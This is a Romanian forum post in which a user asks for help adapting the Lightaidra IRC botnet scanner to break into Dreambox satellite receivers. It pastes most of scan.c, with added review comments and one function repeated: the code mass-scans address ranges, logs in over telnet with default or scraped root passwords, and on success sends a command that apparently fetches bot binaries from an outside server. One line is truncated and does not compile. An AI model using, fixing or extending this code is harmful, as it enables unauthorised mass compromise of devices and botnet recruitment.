gugustiuc

Intrebare C++


In primul rand va salut pe toti. Am gasit si eu tot pe aici scanner-ul/botnet-ul lightaidra.

Treaba e ca intra doar in routere si tot felul de ciudatenii.

M-am uitat peste fisierul scan.c si stiu unde trebuie modificat pt ce imi trebuie mie(receivere de sat mipsel/ppc)

Ce am eu nevoie(partea de autentificare) e asa:

##############################

welcome on your dreambox! - Kernel 2.6.9 (18:54:07).

dreambox login: root

Password:

BusyBox v1.01 (2009.12.12-13:19+0000) Built-in shell (ash)

Enter 'help' for a list of built-in commands.

root@dreambox:~>

####################################

sau asa:

####################################

welcome on your dreambox!

Kernel 2.6.18-7.4-dm500hd (#1 SMP Fri Feb 24 16:00:00 CET 2012).

dm500hd login: root

Password:

root@dm500hd:~#

####################################

din ce am vazut in scan.c cred ca da failure chiar daca intra in ele deoarece nu ii apare lui ce-i trebuie dupa ce baga parola:

#####################################################################

/*
 * cmd_advscan_getpass(sock_t *)
 * Advanced-scanner password finder: writes the global post_request to
 * scan_sp->sockfd and searches the reply for a "password>" element.
 *
 * scan_sp: connection wrapper; only scan_sp->sockfd is used here.
 * Returns EXIT_SUCCESS after storing the extracted text, followed by
 * "\r\n", in the global psw_x; EXIT_FAILURE if the write is reported as
 * failed or no such element is found.
 *
 * NOTE(review): `true` and `false` are compared against int results; their
 * definitions are not on this page, so the exact sense of those comparisons
 * cannot be confirmed from here.
 */
int cmd_advscan_getpass(sock_t *scan_sp)
{
    char temp[801];
    char *one, *two;

    /* post_request (defined elsewhere) is passed in sockwrite()'s format position. */
    if (sockwrite(scan_sp->sockfd, post_request) == false)
        return EXIT_FAILURE;

    /* Two reads into the same buffer: the second (up to 800 bytes) starts at
     * temp[0] again. Neither return value is kept, so the code below does not
     * know how many bytes of temp are valid, and temp is not NUL-terminated
     * before it is tokenised. */
    recv(scan_sp->sockfd, temp, 100, 0);
    recv(scan_sp->sockfd, temp, 800, 0);
    /* Split the reply on '<' so that each piece begins at a tag name. */
    one = strtok(temp, "<");

    while (one != NULL)
    {
        if (strstr(one, "password>"))
        {
            /* Re-tokenise this piece on '>'. strtok() keeps one internal
             * position, so this call replaces the outer '<' scan. */
            two = strtok(one, ">");
            while (two != NULL)
            {
                /* Presumably selects the first piece that is not the literal
                 * tag name (assumes `true` is 0 - TODO confirm). */
                if (strcmp(two, "password") != true)
                {
                    /* The size bound is the source length plus CR, LF and NUL;
                     * it is not derived from psw_x's capacity, which is
                     * declared elsewhere. */
                    snprintf(psw_x, strlen(two) + 3,
                    "%s\r\n", two);
                    return EXIT_SUCCESS;
                }
                two = strtok(NULL, ">");
            }
        }
        one = strtok(NULL, "<");
    }
    return EXIT_FAILURE;
}

/*
* scan.c - USE LIGHTAIDRA AT YOUR OWN RISK!
*
* Lightaidra - IRC-based mass router scanner/exploiter.
* Copyright (C) Federico Fazzi, <federico@ahacktivia.org>.
*
*/

#include "../include/headers.h"

/* Forward declarations for the routines this file calls before defining them. */

/* Format-string write to descriptor sd; not defined on this page. */
int sockwrite(int sd, const char *fmt, ...);
/* Reads a reply on scan_sp->sockfd and stores an extracted password in psw_x. */
int cmd_advscan_getpass(sock_t *scan_sp);
/* Thread entry point used by cmd_scan_central via pthread_create(). */
void *scan_address(scan_data_t *scan_data);
/* Per-address check; type selects which path is taken (1 or 2). */
int cmd_advscan_control(char *addr, sock_t *sp, requests_t *req,
unsigned short type);
/* Login attempt against addr on telnet_port; type selects the credentials used. */
int cmd_advscan_join(char *addr, sock_t *sp, requests_t *req,
unsigned short type);

/*
 * cmd_scan_central(sock_t *, requests_t *, unsigned short)
 * Scanner driver. Builds the 256 x 256 address list under the prefix
 * req->rcv_sb.req->rcv_sc, probes each address with scan_address() threads
 * (responders are appended to result_file), then runs
 * cmd_advscan_control() on every recorded address and reports hits to
 * `channel` over sp->sockfd.
 *
 * sp:   control connection; every status line is written to sp->sockfd.
 * req:  parsed request; rcv_sb/rcv_sc are the two leading octets and
 *       rcv_sd/rcv_se are reported as user/pass when type is 1.
 * type: 1 = use the credentials in req, 2 = use the password left in psw_x
 *       by cmd_advscan_getpass().
 *
 * Never returns: every path ends in exit(), which presumably means it runs
 * in its own process - TODO confirm against the caller.
 *
 * The PRIVMSG templates ("[vuln] address: ...", "[advscan] scanner
 * completed ...") and the literal "QUOTE ZOMBIE" line are fixed strings
 * written to the control socket.
 */
void cmd_scan_central(sock_t *sp, requests_t *req, unsigned short type)
{
    unsigned short a, b, c;
    int i, x;
    /* One thread handle and one argument slot per concurrent probe. */
    pthread_t pthds[maxthreads];
    scan_data_t scan_data[maxthreads];

    /* total, founds, resfd, hosts, resbuf, restag, psw_x and psw_y are not
     * declared in this function; they are defined elsewhere. */
    total = 0;
    founds = 0;
    c = 0;

    sleep(2);
    /* Start from an empty result file. */
    remove(result_file);
    resfd = fopen(result_file, "a+");
    if (resfd == NULL)
    {
        sockwrite(sp->sockfd, "PRIVMSG %s :[error] unable to open: %s\n",
        channel, result_file);
        sockwrite(sp->sockfd, "QUOTE ZOMBIE\n");
        exit(EXIT_FAILURE);
    }

    memset(hosts, 0, sizeof hosts);
    for (a = 0; a <= 255; a++)
    {
        for (b = 0; b <= 255; b++)
        {
            /* NOTE(review): the next statement is truncated in the page as
             * captured - the last argument and the closing parenthesis are
             * missing - so this block does not compile as shown. */
            snprintf(hosts[c], sizeof(hosts[c]), "%s.%s.%d.%d",
            req->rcv_sb, req->rcv_sc, a, ;
            c++;
        }
    }

    /* Phase 1: probe the list in batches of up to maxthreads threads.
     * i is advanced by the inner launch loop, not by this for header. */
    for (i = 0; i <= maxhosts;)
    {
        /* An entry shorter than 7 characters is treated as end of list. */
        if (strlen(hosts[i]) < 7)
            break;

        for (x = 0; x < maxthreads; x++, i++)
        {
            if (strlen(hosts[i]) < 7)
                break;

            memset(scan_data[x].hostname, 0, sizeof(scan_data[x].hostname));
            snprintf(scan_data[x].hostname, 31, "%s", hosts[i]);

            if (pthread_create
            (&pthds[x], NULL, (void *)&scan_address,
            (scan_data_t *) & scan_data[x]) != 0)
            {
                if(all_messages)
                    sockwrite(sp->sockfd, "PRIVMSG %s :[crash] scanner has crashed, continuing to pwning..\n",
                    channel);
                goto crash;
            }
        }

        /* Wait for the batch. The length check here reads hosts[i] after i
         * was advanced by the launch loop above. */
        for (x = 0; x < maxthreads; x++)
        {
            if (strlen(hosts[i]) < 7)
                break;
            if (pthread_join(pthds[x], NULL) != 0)
            {
                if(all_messages)
                    sockwrite(sp->sockfd, "PRIVMSG %s :[crash] scanner has crashed, continuing to pwning..\n",
                    channel);
                goto crash;
            }
        }
    }

    /* Reached after a normal scan and after a thread create/join failure. */
    crash:

    /* total is incremented by scan_address() for each recorded responder. */
    if (!total)
    {
        if(all_messages)
            sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanner completed, founds %d ips..\n",
            channel, total);
        exit(EXIT_SUCCESS);
    }
    else
    {
        if(all_messages)
            sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanner completed, founds %d ips, pwning time..\n",
            channel, total);
    }

    /* Phase 2: re-open the result file for reading. The handle opened at
     * the top of the function is not closed before resfd is reassigned. */
    if ((resfd = fopen(result_file, "r+")) == NULL)
    {
        sockwrite(sp->sockfd, "PRIVMSG %s :[error] unable to open: %s\n",
        channel, result_file);
        sockwrite(sp->sockfd, "QUOTE ZOMBIE\n");
        exit(EXIT_FAILURE);
    }

    while (fgets(resbuf, sizeof(resbuf) - 1, resfd) != NULL)
    {
        /* One address per line; at most 16 characters are taken. */
        sscanf(resbuf, "%16s", restag);
        if (cmd_advscan_control(restag, sp, req, type) == 0)
        {
            if (all_messages)
            {
                if (type == 1)
                {
                    sockwrite(sp->sockfd,
                    "PRIVMSG %s :[vuln] address: %s (user:%s pass:%s) possible vuln with default password!\n",
                    channel, restag, req->rcv_sd, req->rcv_se);
                }
                else if (type == 2)
                {
                    /* Copies psw_x without its last two bytes (the "\r\n"
                     * appended by cmd_advscan_getpass). strncpy() adds no
                     * terminator here; psw_y's prior contents are not shown. */
                    strncpy(psw_y, psw_x, strlen(psw_x) - 2);
                    sockwrite(sp->sockfd,
                    "PRIVMSG %s :[vuln] address: %s (user:root pass:%s) possible vuln with config file post request!\n",
                    channel, restag, psw_y);
                }
            }
        }
        memset(restag, 0, sizeof restag);
    }

    fclose(resfd);
    sockwrite(sp->sockfd, "QUOTE ZOMBIE\n");
    /* The normal end of the run also exits with EXIT_FAILURE. */
    exit(EXIT_FAILURE);
}

/*
 * scan_address(scan_data_t *)
 * Thread body for one probe. Opens a non-blocking TCP connection to
 * scan_data->hostname on telnet_port and, if the peer sends data within
 * the timeout, appends the address to result_file and increments total.
 *
 * scan_data: per-thread argument; only scan_data->hostname is read.
 * Always ends with pthread_exit(NULL); no value is returned to the joiner.
 *
 * timeout_value, tm and total are not declared in this function, so they
 * are shared by every thread running it; no lock is taken here.
 *
 * NOTE(review): several results are compared with `false`, whose value is
 * defined elsewhere and not shown on this page.
 */
void *scan_address(scan_data_t *scan_data)
{
    FILE *rfd;
    int retv, flags;
    fd_set rd, wr;
    char temp[128];
    sock_t *scan_isp;

    /* The allocation result is used without a NULL check. */
    scan_isp = (sock_t *) malloc(sizeof(sock_t));

    /* Only a zero return is treated as failure; scan_isp is not freed on
     * this path. */
    if (!(scan_isp->sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP)))
        pthread_exit(NULL);

    memset(temp, 0, sizeof temp);
    memset(&scan_isp->sockadr, 0, sizeof scan_isp->sockadr);
    scan_isp->sockadr.sin_port = htons(telnet_port);
    scan_isp->sockadr.sin_family = AF_INET;

    /* 1 s + 500000 us, used for both select() calls below. */
    timeout_value = 1;
    tm.tv_sec = timeout_value;
    tm.tv_usec = 500000;

    /* hostname must be a dotted-quad string; no name resolution happens here. */
    if (!inet_aton((const char *)scan_data->hostname, (struct in_addr *)&scan_isp->sockadr.sin_addr))
    {
        close(scan_isp->sockfd);
        free(scan_isp);
        pthread_exit(NULL);
    }

    /* Remember the original flags so blocking mode can be restored later. */
    flags = fcntl(scan_isp->sockfd, F_GETFL, 0);
    if (fcntl(scan_isp->sockfd, F_SETFL, O_NONBLOCK) == false)
    {
        close(scan_isp->sockfd);
        free(scan_isp);
        pthread_exit(NULL);
    }

    /* Non-blocking connect: EINPROGRESS is the expected "still connecting"
     * result; any other error ends the probe. */
    if (connect(scan_isp->sockfd, (struct sockaddr *)&scan_isp->sockadr,
    sizeof(scan_isp->sockadr)) == -1)
    {
        if (errno != EINPROGRESS)
        {
            close(scan_isp->sockfd);
            free(scan_isp);
            pthread_exit(NULL);
        }
    }

    /* Wait until the socket is writable. wr is not cleared with FD_ZERO in
     * this function. */
    FD_SET(scan_isp->sockfd, &wr);
    if (!(retv = select(scan_isp->sockfd + 1, NULL, &wr, NULL, &tm)))
    {
        /* select() returned 0: timed out. */
        close(scan_isp->sockfd);
        free(scan_isp);
        pthread_exit(NULL);
    }
    else if (retv == false)
    {
        close(scan_isp->sockfd);
        free(scan_isp);
        pthread_exit(NULL);
    }

    /* First read, still non-blocking: the probe continues only when this
     * call returns `false` and errno is EWOULDBLOCK (checked next). */
    if (recv(scan_isp->sockfd, temp, sizeof(temp) - 1, 0) != false) //--
    {
        close(scan_isp->sockfd);
        free(scan_isp);
        pthread_exit(NULL);
    }

    if (errno != EWOULDBLOCK)
    {
        close(scan_isp->sockfd);
        free(scan_isp);
        pthread_exit(NULL);
    }

    /* Wait for the peer to send something. rd is not cleared with FD_ZERO
     * in this function. */
    FD_SET(scan_isp->sockfd, &rd);
    if (!(retv = select(scan_isp->sockfd + 1, &rd, NULL, NULL, &tm)))
    {
        close(scan_isp->sockfd);
        free(scan_isp);
        pthread_exit(NULL);
    }
    else if (retv == -1)
    {
        close(scan_isp->sockfd);
        free(scan_isp);
        pthread_exit(NULL);
    }
    else
    {
        /* Readable: restore the saved flags, then read. */
        if ((fcntl(scan_isp->sockfd, F_SETFL, flags)) == false)
        {
            close(scan_isp->sockfd);
            free(scan_isp);
            pthread_exit(NULL);
        }

        if (recv(scan_isp->sockfd, temp, sizeof(temp) - 1, 0) != false)
        {
            /* Record the responder: one address per line, appended through a
             * handle opened and closed by this thread. */
            rfd = fopen(result_file, "a+");
            if (rfd != NULL)
            {
                fprintf(rfd, "%s\n", scan_data->hostname);
                fflush(rfd);
                fclose(rfd);
                total++;
            }
        }
    }
    close(scan_isp->sockfd);
    free(scan_isp);
    pthread_exit(NULL);
}

/*
 * __alarm()
 * SIGALRM handler used as a socket timeout: closes the descriptor held in
 * the global scan_sp. Installed with signal(SIGALRM, __alarm) before the
 * connect() calls in cmd_advscan_control() and cmd_advscan_join().
 */
void __alarm()
{
    /* scan_sp is not a parameter here; it is the object assigned by the
     * two functions that install this handler. */
    close(scan_sp->sockfd);
    return;
}

/*
 * cmd_advscan_control(char *, sock_t *, requests_t *, unsigned short)
 * Per-address dispatcher for the second scan phase.
 *
 * addr: address string read from result_file by the caller.
 * sp:   control connection, passed through to cmd_advscan_join().
 * req:  parsed request, passed through to cmd_advscan_join().
 * type: 1 = go straight to cmd_advscan_join() with the credentials in req;
 *       2 = first connect to addr on http_port, run cmd_advscan_getpass(),
 *           and only then call cmd_advscan_join().
 *
 * Returns EXIT_SUCCESS (and increments the global founds) when the join
 * step reports success, EXIT_FAILURE otherwise.
 *
 * NOTE(review): results are compared with `true`/`false`, whose values are
 * defined elsewhere and not shown on this page.
 */
int cmd_advscan_control(char *addr, sock_t *sp,
requests_t *req, unsigned short type)
{
    if (type == 1)
    {
        if (cmd_advscan_join(addr, sp, req, 1) == true)
        {
            founds++;
            return EXIT_SUCCESS;
        }
        else
            return EXIT_FAILURE;
    }
    else if (type == 2)
    {
        /* scan_sp is not declared in this function; the same object is
         * closed by the __alarm() handler. */
        scan_sp = (sock_t *) malloc(sizeof(sock_t));
        /* The lookup result is dereferenced below without a NULL check. */
        scan_sp->sockhs = gethostbyname(addr);
        scan_sp->sockfd = socket(AF_INET, SOCK_STREAM, 0);
        scan_sp->sockadr.sin_family = AF_INET;
        scan_sp->sockadr.sin_port = htons(http_port);
        scan_sp->sockadr.sin_addr =
        *((struct in_addr *)scan_sp->sockhs->h_addr);
        memset(scan_sp->sockadr.sin_zero, '\0',
        sizeof scan_sp->sockadr.sin_zero);

        timeout_value = 1;
        tm.tv_sec = timeout_value;
        tm.tv_usec = 500000;

        /* Bound the blocking connect(): after timeout_value seconds the
         * handler closes the socket. */
        signal(SIGALRM, __alarm);
        alarm(timeout_value);
        if (connect
        (scan_sp->sockfd, (struct sockaddr *)&scan_sp->sockadr,
        sizeof scan_sp->sockadr) == false)
        {
            /* This path frees scan_sp without closing scan_sp->sockfd. */
            alarm(0);
            signal(SIGALRM, SIG_DFL);
            free(scan_sp);
            return EXIT_FAILURE;
        }

        if (cmd_advscan_getpass(scan_sp) == true)
        {
            /* A password was stored in psw_x; drop this connection and try
             * the login path with it. */
            close(scan_sp->sockfd);
            free(scan_sp);
            if (cmd_advscan_join(addr, sp, req, 2) == true)
            {
                founds++;
                return EXIT_SUCCESS;
            }
            else
                return EXIT_FAILURE;
        }
    }
    /* Reached when type 2 found no password, and also for any type other
     * than 1 or 2, in which case scan_sp was not assigned in this call. */
    close(scan_sp->sockfd);
    free(scan_sp);
    return EXIT_FAILURE;
}

/*
 * cmd_advscan_getpass(sock_t *)
 * Advanced-scanner password finder: writes the global post_request to
 * scan_sp->sockfd and searches the reply for a "password>" element.
 *
 * scan_sp: connection wrapper; only scan_sp->sockfd is used here.
 * Returns EXIT_SUCCESS after storing the extracted text, followed by
 * "\r\n", in the global psw_x; EXIT_FAILURE if the write is reported as
 * failed or no such element is found.
 *
 * NOTE(review): `true` and `false` are compared against int results; their
 * definitions are not on this page, so the exact sense of those comparisons
 * cannot be confirmed from here.
 */
int cmd_advscan_getpass(sock_t *scan_sp)
{
    char temp[801];
    char *one, *two;

    /* post_request (defined elsewhere) is passed in sockwrite()'s format position. */
    if (sockwrite(scan_sp->sockfd, post_request) == false)
        return EXIT_FAILURE;

    /* Two reads into the same buffer: the second (up to 800 bytes) starts at
     * temp[0] again. Neither return value is kept, so the code below does not
     * know how many bytes of temp are valid, and temp is not NUL-terminated
     * before it is tokenised. */
    recv(scan_sp->sockfd, temp, 100, 0);
    recv(scan_sp->sockfd, temp, 800, 0);
    /* Split the reply on '<' so that each piece begins at a tag name. */
    one = strtok(temp, "<");

    while (one != NULL)
    {
        if (strstr(one, "password>"))
        {
            /* Re-tokenise this piece on '>'. strtok() keeps one internal
             * position, so this call replaces the outer '<' scan. */
            two = strtok(one, ">");
            while (two != NULL)
            {
                /* Presumably selects the first piece that is not the literal
                 * tag name (assumes `true` is 0 - TODO confirm). */
                if (strcmp(two, "password") != true)
                {
                    /* The size bound is the source length plus CR, LF and NUL;
                     * it is not derived from psw_x's capacity, which is
                     * declared elsewhere. */
                    snprintf(psw_x, strlen(two) + 3,
                    "%s\r\n", two);
                    return EXIT_SUCCESS;
                }
                two = strtok(NULL, ">");
            }
        }
        one = strtok(NULL, "<");
    }
    return EXIT_FAILURE;
}

/*
 * cmd_advscan_join(char *, sock_t *, requests_t *, unsigned short)
 * Login attempt against addr on telnet_port. Sends two lines (user, then
 * password), reads the reply, and treats a reply containing '#' or '$' as
 * a shell prompt. In that case it writes the getbinaries template,
 * formatted with reference_http, to the same connection.
 *
 * addr: address string to connect to.
 * sp:   control connection; not used in this function.
 * req:  when type is 1, req->rcv_sd and req->rcv_se are sent as the two
 *       lines.
 * type: 1 = credentials from req; 2 = "root" followed by the global psw_x.
 *
 * Returns EXIT_SUCCESS only on the prompt-match path, EXIT_FAILURE
 * otherwise. getbinaries and reference_http are defined elsewhere; their
 * contents are not shown on this page.
 *
 * On the wire this is a TCP session to telnet_port carrying two short
 * CRLF-terminated lines and, on a match, one further line, with a
 * receive timeout of 2.5 s.
 *
 * NOTE(review): results are compared with `false`, whose value is defined
 * elsewhere and not shown on this page.
 */
int cmd_advscan_join(char
*addr, sock_t *sp, requests_t *req, unsigned short type)
{
    /* Counts send failures during the credential exchange. */
    unsigned short e = 0;

    /* scan_sp is not declared in this function; the same object is closed
     * by the __alarm() handler. */
    scan_sp = (sock_t *) malloc(sizeof(sock_t));
    /* The lookup result is dereferenced below without a NULL check. */
    scan_sp->sockhs = gethostbyname(addr);
    scan_sp->sockfd = socket(AF_INET, SOCK_STREAM, 0);
    scan_sp->sockadr.sin_family = AF_INET;
    scan_sp->sockadr.sin_port = htons(telnet_port);

    scan_sp->sockadr.sin_addr =
    *((struct in_addr *)scan_sp->sockhs->h_addr);

    memset(scan_sp->sockadr.sin_zero, '\0',
    sizeof scan_sp->sockadr.sin_zero);

    /* 2 s + 500000 us receive timeout; the alarm below uses 2 s. */
    timeout_value = 2;
    tm.tv_sec = timeout_value;
    tm.tv_usec = 500000;

    setsockopt(scan_sp->sockfd, SOL_SOCKET,
    SO_RCVTIMEO,(char *)&tm,sizeof(struct timeval));

    /* ignore ++ KILLED BY SIGPIPE ++ */
    signal(SIGPIPE, SIG_IGN);

    /* Bound the blocking connect(): the handler closes the socket. */
    signal(SIGALRM, __alarm);
    alarm(timeout_value);
    if (connect(scan_sp->sockfd, (struct sockaddr *)&scan_sp->sockadr,
    sizeof scan_sp->sockadr) == false)
    {
        /* This path frees scan_sp without closing scan_sp->sockfd. */
        alarm(0);
        signal(SIGALRM, SIG_DFL);
        free(scan_sp);
        return EXIT_FAILURE;
    }

    if (type == 1)
    {
        /* Each send is followed by a read whose content is discarded. */
        if (sockwrite(scan_sp->sockfd, "%s\r\n", req->rcv_sd) == false)
            e++;
        recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);

        if (sockwrite(scan_sp->sockfd, "%s\r\n", req->rcv_se) == false)
            e++;
        recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);

    }
    else if (type == 2)
    {
        /* Fixed user name, then psw_x, which already ends in "\r\n". */
        if (send(scan_sp->sockfd, "root\r\n", strlen("root\r\n"), MSG_NOSIGNAL) ==
        false)
            e++;
        recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);
        send(scan_sp->sockfd, psw_x, strlen(psw_x), MSG_NOSIGNAL);
        recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);
    }

    if (e)
    {
        close(scan_sp->sockfd);
        free(scan_sp);
        return EXIT_FAILURE;
    }

    /* Third read: this is the reply that is inspected. */
    memset(__netbuf, 0, sizeof __netbuf);
    recv_bytes = recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);

    if (recv_bytes == -1)
    {
        close(scan_sp->sockfd);
        free(scan_sp);
        return EXIT_FAILURE;
    }
    __netbuf[recv_bytes] = 0;

    /* Success is inferred only from the presence of '#' or '$' anywhere in
     * the reply; no other part of the reply is examined. */
    if (strchr(__netbuf, '#') != NULL || strchr(__netbuf, '$') != NULL)
    {
        sockwrite(scan_sp->sockfd, getbinaries, reference_http);
        recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);
        recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0);
        sleep(3);

        close(scan_sp->sockfd);
        free(scan_sp);
        return EXIT_SUCCESS;
    }

    close(scan_sp->sockfd);
    free(scan_sp);
    return EXIT_FAILURE;
}

Nu prea am inteles ..am tot incercat sa modific valorile de mai sus dar fara nici un rezultat.

Am cautat pe google tutoriale despre C si de o sapt tot caut dar nu prea am gasit ce sa ma ajute si stiu ca pt multi de aici e un lucru banal..

Va multumesc pt ajutor oricat de mic ar fi el.

Toate cele bune.
